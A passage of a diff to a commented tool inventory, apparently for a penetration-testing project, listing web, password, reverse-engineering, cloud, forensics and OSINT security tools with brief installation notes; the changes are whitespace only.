sqlmap, wpscan, arjun, paramspider, x8, katana, httpx # - dalfox, jaeles, hakrawler, gau, waybackurls, wafw00f -# +# # ๐Ÿ” Authentication & Password (12+ tools): # - hydra, john, hashcat, medusa, patator, netexec # - evil-winrm, hash-identifier, ophcrack -# +# # ๐Ÿ”ฌ Binary Analysis & Reverse Engineering (25+ tools): # - ghidra, radare2, gdb, binwalk, ropgadget, checksec, strings # - volatility3, foremost, steghide, exiftool, angr, pwntools -# +# # โ˜๏ธ Cloud & Container Security (20+ tools): # - prowler, scout-suite, trivy, kube-hunter, kube-bench # - docker-bench-security, checkov, terrascan, falco -# +# # ๐Ÿ† CTF & Forensics (20+ tools): # - volatility3, autopsy, sleuthkit, stegsolve, zsteg, outguess # - photorec, testdisk, scalpel, bulk-extractor -# +# # ๐Ÿ•ต๏ธ OSINT & Intelligence (20+ tools): # - sherlock, social-analyzer, recon-ng, maltego, spiderfoot # - shodan-cli, censys-cli, have-i-been-pwned -# +# # Installation Notes: # 1. Kali Linux 2024.1+ includes most tools by default # 2. Ubuntu/Debian users should install tools from official repositories # 3. Some tools require compilation from source or additional setup # 4. Cloud tools require API keys and authentication configuration # 5. Browser Agent requires Chrome/Chromium and ChromeDriver installation -# -# For complete installation instructions and setup guides, see README.md \ No newline at end of file +# +# For complete installation instructions and setup guides, see README.md